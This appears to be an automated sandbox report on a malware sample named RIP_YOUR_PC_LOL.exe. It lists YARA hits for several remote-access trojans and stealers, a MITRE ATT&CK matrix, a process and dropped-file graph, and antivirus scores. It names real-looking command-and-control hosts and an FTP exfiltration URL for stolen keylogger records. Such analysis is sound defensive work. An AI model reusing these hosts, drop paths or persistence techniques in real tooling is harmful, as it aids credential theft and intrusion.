                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.674377761.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.673042782.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000025.00000000.491609227.00000000002A2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\3.exe, type: DROPPED
                    Detected njRat
                    Source: gay.exe.4.dr, OK.cs.Net Code: njRat config detected
                    Yara detected Njrat
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000000.507357595.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000003B.00000000.627731740.00000000007A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000000.548907669.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002E.00000002.610238464.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002A.00000002.552899490.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: gay.exe PID: 1104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mediaget.exe PID: 4688, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mediaget.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Detected HawkEye Rat
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: Pluto Panel.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                    Source: Pluto Panel.exeString found in binary or memory: HawkEyeKeylogger
                    Source: Pluto Panel.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                    Source: Pluto Panel.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                    Source: Pluto Panel.exe, 00000005.00000002.710776976.0000000003B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HqA@HawkEye_Keylogger_Stealer_Records_813435 3.8.2022 6:03:10 PM.txt
                    Source: Pluto Panel.exe, 00000005.00000002.710776976.0000000003B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Hq\[ftp://files.000webhost.com/HawkEye_Keylogger_Stealer_Records_813435 3.8.2022 6:03:10 PM.txt
                    Source: Pluto Panel.exe, 00000005.00000002.710776976.0000000003B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://files.000webhost.com/HawkEye_Keylogger_Stealer_Records_813435%203.8.2022%206:03:10%20PM.txt
                    Source: Pluto Panel.exe, 00000005.00000002.710776976.0000000003B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Hqbaftp://files.000webhost.com/HawkEye_Keylogger_Stealer_Records_813435%203.8.2022%206:03:10%20PM.txt
                    Source: Pluto Panel.exe, 00000005.00000002.710776976.0000000003B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HqBA/HawkEye_Keylogger_Stealer_Records_813435 3.8.2022 6:03:10 PM.txt
                    Source: Pluto Panel.exe, 00000005.00000002.710776976.0000000003B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HqA@HawkEye_Keylogger_Stealer_Records_813435 3.8.2022 6:03:10 PM.txtd8
                    Source: Pluto Panel.exe, 00000005.00000002.710776976.0000000003B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HqHGSTOR HawkEye_Keylogger_Stealer_Records_813435 3.8.2022 6:03:10 PM.txt
                    Source: Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: Pluto Panel.exe, 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Hq'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: Pluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HawkEyeKeylogger
                    Source: Pluto Panel.exe, 00000005.00000002.706244077.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Hq#"HawkEye_Keylogger_Stealer_Records_
                    Yara detected Ficker Stealer
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.18.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.19.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.0fd7de5367376231a788872005d7ed4f.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.468272297.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_03230A8E listen,5_2_03230A8E
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_03230E9E bind,5_2_03230E9E
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_03230E6B bind,5_2_03230E6B
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: 5_2_03230A50 listen,5_2_03230A50

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    1
                    Replication Through Removable Media                    		12
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		21
                    Disable or Modify Tools                    		121
                    Input Capture                    		1
                    System Time Discovery                    		1
                    Replication Through Removable Media                    		11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Ingress Tool Transfer                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Shared Modules                    		2
                    Windows Service                    		2
                    Windows Service                    		11
                    Deobfuscate/Decode Files or Information                    		LSASS Memory1
                    Peripheral Device Discovery                    		Remote Desktop Protocol121
                    Input Capture                    		Exfiltration Over Bluetooth1
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts2
                    Scheduled Task/Job                    		2
                    Scheduled Task/Job                    		212
                    Process Injection                    		141
                    Obfuscated Files or Information                    		Security Account Manager1
                    File and Directory Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Non-Standard Port                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)221
                    Registry Run Keys / Startup Folder                    		2
                    Scheduled Task/Job                    		15
                    Software Packing                    		NTDS14
                    System Information Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer3
                    Remote Access Software                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon Script221
                    Registry Run Keys / Startup Folder                    		1
                    Timestomp                    		LSA Secrets1
                    Query Registry                    		SSHKeyloggingData Transfer Size Limits2
                    Non-Application Layer Protocol                    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    DLL Side-Loading                    		Cached Domain Credentials221
                    Security Software Discovery                    		VNCGUI Input CaptureExfiltration Over C2 Channel112
                    Application Layer Protocol                    		Jamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items22
                    Masquerading                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                    Virtualization/Sandbox Evasion                    		Proc Filesystem21
                    Virtualization/Sandbox Evasion                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)212
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    Remote System Discovery                    		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                    Hidden Files and Directories                    		Network Sniffing1
                    System Network Configuration Discovery                    		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 585264 Sample: RIP_YOUR_PC_LOL.exe Startdate: 08/03/2022 Architecture: WINDOWS Score: 100 78 yabynennet.xyz 2->78 80 whatismyipaddress.com 2->80 82 13 other IPs or domains 2->82 96 Malicious sample detected (through community Yara rule) 2->96 98 Antivirus detection for dropped file 2->98 100 Antivirus / Scanner detection for submitted sample 2->100 102 36 other signatures 2->102 9 RIP_YOUR_PC_LOL.exe 9 2->9         started        signatures3 process4 file5 56 C:\Users\user\AppData\...\healastounding.exe, PE32 9->56 dropped 58 C:\Users\user\AppData\Roaming\___11.19.exe, PE32 9->58 dropped 60 C:\Users\user\AppData\...\Pluto Panel.exe, PE32 9->60 dropped 62 3 other malicious files 9->62 dropped 12 healastounding.exe 11 9->12         started        16 22.exe 9->16         started        18 0fd7de5367376231a788872005d7ed4f.exe 9->18         started        20 Pluto Panel.exe 4 9->20         started        process6 file7 64 C:\Users\user\AppData\Roaming\test.exe, PE32 12->64 dropped 66 C:\Users\user\AppData\Roaming\gay.exe, PE32 12->66 dropped 68 C:\Users\user\AppData\Roaming\aaa.exe, PE32 12->68 dropped 76 5 other malicious files 12->76 dropped 126 Antivirus detection for dropped file 12->126 128 Machine Learning detection for dropped file 12->128 22 gay.exe 1 5 12->22         started        26 Opus.exe 1 13 12->26         started        29 8f1c8b40c7be588389a8d382040b23bb.exe 12->29         started        33 3 other processes 12->33 70 C:\Windows\Help\active_desktop_render.dll, PE32 16->70 dropped 72 C:\Windows\Help\Winlogon.exe, PE32 16->72 dropped 74 C:\Windows\Cursors\WUDFhosts.exe, PE32+ 16->74 dropped 130 Multi AV Scanner detection for dropped file 16->130 132 Uses netsh to modify the Windows network and firewall settings 16->132 134 May check the online IP address of the machine 18->134 31 0fd7de5367376231a788872005d7ed4f.exe 18->31         started        signatures8 process9 dnsIp10 42 C:\Users\user\AppData\Roaming\mediaget.exe, PE32 22->42 dropped 112 Antivirus detection for dropped file 22->112 114 Machine Learning detection for dropped file 22->114 35 mediaget.exe 22->35         started        86 172.98.92.42, 49773, 49776, 49778 TOTAL-SERVER-SOLUTIONSUS United States 26->86 44 C:\Program Files (x86)\...\dhcpmon.exe, PE32 26->44 dropped 46 C:\Users\user\AppData\Roaming\...\run.dat, data 26->46 dropped 48 C:\Users\user\AppData\Local\...\tmp4896.tmp, XML 26->48 dropped 116 Uses schtasks.exe or at.exe to add and modify task schedules 26->116 118 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->118 50 C:\Users\user\AppData\...\FFDvbcrdfqs.exe, PE32 29->50 dropped 52 C:\Users\user\AppData\Local\...\Dcvxaamev.exe, PE32 29->52 dropped 120 Multi AV Scanner detection for dropped file 29->120 122 Sample uses process hollowing technique 29->122 88 80.87.192.115, 49771, 80 THEFIRST-ASRU Russian Federation 31->88 90 api.ipify.org.herokudns.com 52.20.78.240, 49770, 80 AMAZON-AESUS United States 31->90 92 api.ipify.org 31->92 94 gfhhjgh.duckdns.org 179.13.1.253, 8050 ColombiaMovilCO Colombia 33->94 54 C:\Users\user\AppData\Roaming\3.exe, PE32 33->54 dropped 124 Injects a PE file into a foreign processes 33->124 file11 signatures12 process13 dnsIp14 84 kazya1.hopto.org 41.249.51.34, 1470 MT-MPLSMA Morocco 35->84 40 C:\...\a797c6ca3f5e7aff8fa1149c47fe9466.exe, PE32 35->40 dropped 104 Antivirus detection for dropped file 35->104 106 Protects its processes via BreakOnTermination flag 35->106 108 Machine Learning detection for dropped file 35->108 110 3 other signatures 35->110 file15 signatures16

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    RIP_YOUR_PC_LOL.exe63%VirustotalBrowse
                    RIP_YOUR_PC_LOL.exe33%MetadefenderBrowse
                    RIP_YOUR_PC_LOL.exe74%ReversingLabsByteCode-MSIL.Trojan.Remcos
                    RIP_YOUR_PC_LOL.exe100%AviraTR/AD.MExecute.lzrac
                    RIP_YOUR_PC_LOL.exe100%AviraSPR/Tool.MailPassView.473
                    RIP_YOUR_PC_LOL.exe100%AviraTR/AD.MalwareCrypter.rrsdk
                    RIP_YOUR_PC_LOL.exe100%AviraTR/Dropper.GR
                    RIP_YOUR_PC_LOL.exe100%AviraTR/Agent.aagt
                    RIP_YOUR_PC_LOL.exe100%AviraTR/AD.RedLineSteal.cjshc
